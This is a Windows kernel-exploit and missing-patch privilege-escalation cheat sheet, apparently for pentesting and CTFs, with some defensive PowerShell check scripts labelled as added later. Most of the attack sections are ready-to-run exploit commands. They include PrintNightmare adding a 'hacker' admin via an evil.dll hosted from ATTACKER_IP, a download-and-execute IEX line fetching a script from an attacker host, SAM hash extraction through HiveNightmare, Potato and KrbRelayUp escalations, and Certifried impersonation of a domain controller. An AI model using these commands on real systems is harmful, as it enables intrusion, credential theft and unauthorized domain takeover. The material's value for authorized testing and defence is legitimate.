Kernel Exploits & Missing Patches

When service misconfigs and token tricks aren't viable, target the kernel itself. Identify missing patches, match them to known exploits, and get SYSTEM through unpatched vulnerabilities.


Patch Enumeration

System Information

Pull OS version and installed patches.

powershell
PS C:\> systeminfo

List hotfixes.

powershell
PS C:\> wmic qfe list brief
powershell
PS C:\> Get-HotFix | Sort-Object -Property InstalledOn -Descending | Select-Object HotFixID, InstalledOn, Description

Check specific KBs (useful when verifying if a target vulnerability is patched).

powershell
PS C:\> wmic qfe get HotFixID | findstr /i "KB5005565 KB5004442 KB5003637"

Tip
Compare the OS build number (systeminfo | findstr /C:"OS Version") against Microsoft’s build history. If the build is months old, it’s a good candidate for kernel exploits.
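As an added example (not from the original page), a small PowerShell function that checks a host for a set of KB IDs and prints the exact build level, so a suspected missing patch can be confirmed on the box itself rather than only from a WES-NG report; the KB IDs are the ones quoted above and `Get-MissingKB` is an assumed name.

```powershell
# Added example, not from the original page. Reports which of a set of KBs are
# absent and prints the OS build, so a suspected missing patch can be confirmed.
# Caveat: a later cumulative update supersedes older KBs without listing them,
# so treat "missing" as a lead and confirm against the build/UBR as well.
function Get-MissingKB {
    param([Parameter(Mandatory)] [string[]] $RequiredKB)

    $installed = Get-HotFix | Select-Object -ExpandProperty HotFixID
    foreach ($kb in $RequiredKB) {
        [pscustomobject]@{
            HotFixID  = $kb
            Installed = ($installed -contains $kb)
        }
    }
}

# Build number plus Update Build Revision (UBR) identify the cumulative update level.
$os  = Get-CimInstance Win32_OperatingSystem
$ubr = (Get-ItemProperty 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion').UBR
"{0} build {1}.{2}" -f $os.Caption, $os.BuildNumber, $ubr

# KB IDs taken from the findstr example above; replace with those for your finding.
Get-MissingKB -RequiredKB 'KB5005565','KB5004442','KB5003637' |
    Where-Object { -not $_.Installed }
```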

Automated Exploit Suggestion

Windows Exploit Suggester (WES-NG)

The go-to tool for matching systeminfo output against known exploits.

terminal
# On attacker: update the database first
root@localhost:~# python3 wes.py --update
powershell
# On target: save systeminfo output
PS C:\> systeminfo > systeminfo.txt
terminal
# On attacker: run WES-NG against the output
root@localhost:~# python3 wes.py systeminfo.txt

Filter for privilege escalation only.

terminal
root@localhost:~# python3 wes.py systeminfo.txt --impact "Elevation of Privilege"

Filter for exploits with known public exploit code.

terminal
root@localhost:~# python3 wes.py systeminfo.txt --impact "Elevation of Privilege" --exploits-only

Sherlock / Watson (On-Target)

Watson (C#, newer, recommended over Sherlock).

powershell
PS C:\> .\Watson.exe

Sherlock (PowerShell, older but still works).

powershell
PS C:\> . .\Sherlock.ps1
PS C:\> Find-AllVulns

Or load remotely.

powershell
PS C:\> IEX(New-Object Net.WebClient).DownloadString('http://<ATTACKER_IP>/Sherlock.ps1')
PS C:\> Find-AllVulns

Tip
WES-NG runs on your attacker machine (OPSEC-safe). Watson/Sherlock run on the target (faster, but riskier). Use WES-NG by default, Watson if you need quick results on-target.

Notable Kernel Exploits

PrintNightmare (CVE-2021-1675 / CVE-2021-34527)

Remote code execution and local privilege escalation via the Print Spooler service.

Check if Spooler is running.

powershell
PS C:\> sc query spooler
PS C:\> Get-Service spooler

Check if patched.

powershell
PS C:\> Get-HotFix | Where-Object { $_.HotFixID -match "KB5004945|KB5004946|KB5004947|KB5004948|KB5004950|KB5004951|KB5004953|KB5004954|KB5004955|KB5004956|KB5004958|KB5004959" }
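An added example (not from the original page) that goes one step past the service and KB checks above: the July 2021 fix only takes effect when the Point and Print policy values are at their restricted settings, so this reports the Spooler state together with those values and can stop the service on hosts that never print. `Test-PrintNightmareExposure` and the `-StopSpooler` switch are assumed names.

```powershell
# Added example, not from the original page. Reports the Spooler state and the
# Point and Print policy values that decide whether the July 2021 PrintNightmare
# fix (the KBs listed above) is actually in effect, then optionally stops and
# disables the service (-StopSpooler is an assumed switch name).
function Test-PrintNightmareExposure {
    param([switch] $StopSpooler)

    $svc = Get-Service -Name Spooler -ErrorAction SilentlyContinue
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint'
    $pp  = Get-ItemProperty -Path $key -ErrorAction SilentlyContinue

    # Post-patch default is restricted (1). A value of 0 reopens non-admin driver
    # installs; either "no warning" value being non-zero does the same.
    $restrictToAdmins = if ($null -eq $pp.RestrictDriverInstallationToAdministrators) { 1 }
                        else { [int]$pp.RestrictDriverInstallationToAdministrators }
    $weak = ($restrictToAdmins -eq 0) -or
            ([int]$pp.NoWarningNoElevationOnInstall -ne 0) -or
            ([int]$pp.UpdatePromptSettings -ne 0)

    if ($StopSpooler -and $svc -and $svc.Status -eq 'Running') {
        Stop-Service -Name Spooler -Force
        Set-Service -Name Spooler -StartupType Disabled
    }

    [pscustomobject]@{
        SpoolerStatus           = if ($svc) { $svc.Status } else { 'NotInstalled' }
        RestrictToAdmins        = $restrictToAdmins
        WeakPointAndPrintPolicy = $weak
        Exposed                 = ($svc -and $svc.Status -eq 'Running' -and $weak)
    }
}

Test-PrintNightmareExposure
```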

Local privilege escalation variant (add a local admin).

powershell
# Using the PowerShell PoC
PS C:\> Import-Module .\CVE-2021-1675.ps1
PS C:\> Invoke-Nightmare -NewUser "hacker" -NewPassword "Password123!" -DriverName "PrinterDriver"

Remote variant (requires SMB share hosting the DLL).

bash shell
# On attacker: host malicious DLL on SMB
root@localhost:~# impacket-smbserver share . -smb2support
terminal
root@localhost:~# python3 CVE-2021-1675.py <DOMAIN>/<USER>:<PASS>@<TARGET> '\\<ATTACKER_IP>\share\evil.dll'

HiveNightmare / SeriousSAM (CVE-2021-36934)

SAM, SYSTEM, and SECURITY hive files are world-readable due to misconfigured shadow copy ACLs. Affects Windows 10 versions 1809 through 21H1.

Check if vulnerable.

powershell
PS C:\> icacls C:\Windows\System32\config\SAM

If BUILTIN\Users has read access, it’s vulnerable.

powershell
# Copy from shadow copies
PS C:\> .\HiveNightmare.exe

This creates SAM-haxx, SYSTEM-haxx, SECURITY-haxx in the current directory.

bash shell
# Extract hashes on attacker
root@localhost:~# impacket-secretsdump -sam SAM-haxx -system SYSTEM-haxx -security SECURITY-haxx LOCAL
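An added example (not from the original page) that performs the icacls check above programmatically for all three hives, counts the shadow copies that still hold readable copies, and optionally applies Microsoft's documented workaround for CVE-2021-36934 (restore ACL inheritance on the config directory, then delete existing shadow copies). `Test-HiveNightmare` and the `-Remediate` switch are assumed names; it expects to run elevated.

```powershell
# Added example, not from the original page. Assesses CVE-2021-36934 exposure
# and, with -Remediate (assumed switch name), applies the documented workaround.
# Note: deleting shadow copies also removes restore points on that volume.
function Test-HiveNightmare {
    [CmdletBinding()]
    param([switch] $Remediate)

    $hives = 'SAM','SYSTEM','SECURITY' |
        ForEach-Object { Join-Path $env:windir "System32\config\$_" }

    $exposed = foreach ($h in $hives) {
        $acl = Get-Acl -Path $h
        $userRead = $acl.Access | Where-Object {
            $_.IdentityReference -eq 'BUILTIN\Users' -and
            $_.AccessControlType -eq 'Allow' -and
            (($_.FileSystemRights -band
              [System.Security.AccessControl.FileSystemRights]::ReadData) -ne 0)
        }
        [pscustomobject]@{ Hive = $h; UsersCanRead = [bool]$userRead }
    }
    $vulnerable = ($exposed.UsersCanRead -contains $true)

    # Shadow copies keep the old, readable hive versions even after the ACL is fixed.
    $shadows = (vssadmin list shadows 2>$null | Select-String 'Shadow Copy ID').Count

    if ($Remediate -and $vulnerable) {
        icacls "$env:windir\System32\config\*.*" /inheritance:e | Out-Null
        vssadmin delete shadows /all /quiet | Out-Null
    }

    [pscustomobject]@{
        Vulnerable   = $vulnerable
        ShadowCopies = $shadows
        Hives        = $exposed
    }
}

Test-HiveNightmare
```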

EfsPotato (CVE-2021-36942 + Named Pipe Impersonation)

Combines EFS coercion with local named pipe impersonation. Works on many unpatched systems.

powershell
PS C:\> .\EfsPotato.exe "cmd /c net localgroup Administrators <USER> /add"

Tip
EfsPotato is integrated into SweetPotato. If SweetPotato is available, it can use this technique automatically.

PetitPotam Local (CVE-2021-36942)

Local variant of PetitPotam for privilege escalation on the same machine.

powershell
PS C:\> .\PetitPotamLocal.exe cmd.exe

KrbRelayUp

Combines Kerberos relay with RBCD or Shadow Credentials for local privilege escalation on domain-joined machines. No admin access needed, just a domain user. [Requires domain-joined machine]

RBCD method.

powershell
PS C:\> .\KrbRelayUp.exe relay -m rbcd -cls {752073A1-23F2-4396-85F0-8FDB879ED0ED}
PS C:\> .\KrbRelayUp.exe spawn -m rbcd -d <DOMAIN_FQDN> -dc <DC_IP> -s <SPN>

Shadow Credentials method (requires AD CS in the environment).

powershell
PS C:\> .\KrbRelayUp.exe relay -m shadowcred -cls {752073A1-23F2-4396-85F0-8FDB879ED0ED}
PS C:\> .\KrbRelayUp.exe spawn -m shadowcred -d <DOMAIN_FQDN> -dc <DC_IP>

Tip
KrbRelayUp is one of the most reliable modern local privesc techniques on domain-joined machines. It works even when potato attacks are blocked.

Certifried (CVE-2022-26923)

Escalate to DA by abusing machine account certificate enrollment. Create a machine account with the same dnsHostName as a DC, request a cert, and authenticate as the DC.

bash shell
# Create machine account with DC's dnsHostName
root@localhost:~# certipy account create -u <USER>@<DOMAIN_FQDN> -p <PASS> -user 'YOURPC$' -pass 'FakePass!' -dns <DC_FQDN> -dc-ip <DC_IP>

# Request cert (will be issued for the DC)
root@localhost:~# certipy req -u 'YOURPC$'@<DOMAIN_FQDN> -p 'FakePass!' -dc-ip <DC_IP> -ca <CA_NAME> -template Machine

# Auth as the DC
root@localhost:~# certipy auth -pfx dc.pfx -dc-ip <DC_IP>
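An added example (not from the original page) for the domain side of this section: it flags the two preconditions the Certifried chain above relies on, non-admin users being able to create machine accounts (ms-DS-MachineAccountQuota above 0) and any non-DC computer object whose dNSHostName collides with a domain controller's. It assumes the ActiveDirectory module on a domain-joined admin workstation; `Test-CertifriedExposure` is an assumed name.

```powershell
# Added example, not from the original page. Requires the ActiveDirectory module.
# Reports whether ordinary users may add machine accounts and lists computer
# objects that claim a domain controller's DNS host name without being that DC.
function Test-CertifriedExposure {
    Import-Module ActiveDirectory

    $domain = Get-ADDomain
    $quota  = (Get-ADObject -Identity $domain.DistinguishedName `
                -Properties 'ms-DS-MachineAccountQuota').'ms-DS-MachineAccountQuota'

    $dcs     = Get-ADDomainController -Filter *
    $dcNames = $dcs | Select-Object -ExpandProperty HostName
    $dcDNs   = $dcs | Select-Object -ExpandProperty ComputerObjectDN

    # A computer that carries a DC's DNS name but is not that DC's object is suspect.
    $collisions = Get-ADComputer -Filter * -Properties dNSHostName, whenCreated |
        Where-Object { $_.dNSHostName -in $dcNames -and $_.DistinguishedName -notin $dcDNs }

    [pscustomobject]@{
        MachineAccountQuota   = $quota          # default is 10
        UsersCanAddMachines   = ($quota -gt 0)
        DnsHostNameCollisions = $collisions | Select-Object Name, dNSHostName, whenCreated
    }
}

Test-CertifriedExposure
```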

LocalPotato (CVE-2023-21746)

NTLM local relay. Allows reading/writing arbitrary files as SYSTEM without needing SeImpersonatePrivilege.

powershell
PS C:\> .\LocalPotato.exe -i payload.dll -o C:\Windows\System32\target.dll

Tip
LocalPotato doesn’t need SeImpersonatePrivilege, making it unique among potato-style attacks. It works by relaying NTLM auth locally from one protocol to another.

CoercedPotato

Combines multiple coercion methods for token impersonation. Works on recent Windows versions. [Requires SeImpersonatePrivilege]

powershell
PS C:\> .\CoercedPotato.exe -cmd "cmd /c whoami"
PS C:\> .\CoercedPotato.exe -cmd "cmd /c net localgroup Administrators <USER> /add"

Older (But Still Relevant) Kernel Exploits

These target legacy systems you’ll encounter in CTFs and older environments.

MS16-032 (Secondary Logon Handle)

Windows 7/8/10, Server 2008/2012 (pre-March 2016 patches).

powershell
PS C:\> Import-Module .\MS16-032.ps1
PS C:\> Invoke-MS16-032

MS15-051 (Win32k.sys)

Windows 7/8, Server 2008/2012.

powershell
PS C:\> .\ms15-051x64.exe "cmd /c net localgroup Administrators <USER> /add"

MS14-058 (Win32k.sys TrackPopupMenu)

Windows 7/8, Server 2008/2012.

powershell
PS C:\> .\ms14-058.exe

MS11-046 (AFD.sys)

Windows XP/7, Server 2003/2008.

powershell
PS C:\> .\ms11-046.exe

Tip
For CTFs, always check the exact OS version and build number first. Most challenge boxes are intentionally missing specific patches. Match the version to the exploit, don’t spray and pray.

Exploit Compilation Tips

Cross-Compile on Linux (for Windows targets)

C exploits.

bash shell
root@localhost:~# x86_64-w64-mingw32-gcc exploit.c -o exploit.exe

32-bit.

bash shell
root@localhost:~# i686-w64-mingw32-gcc exploit.c -o exploit.exe

C++ exploits.

bash shell
root@localhost:~# x86_64-w64-mingw32-g++ exploit.cpp -o exploit.exe -static

Pre-Compiled Exploit Repositories

Instead of compiling, grab pre-compiled binaries from trusted repos.

https://github.com/SecWiki/windows-kernel-exploits
https://github.com/abatchy17/WindowsExploits

Tip
Always verify pre-compiled binaries. When possible, compile from source yourself. Never run untrusted binaries from random GitHub repos on client infrastructure.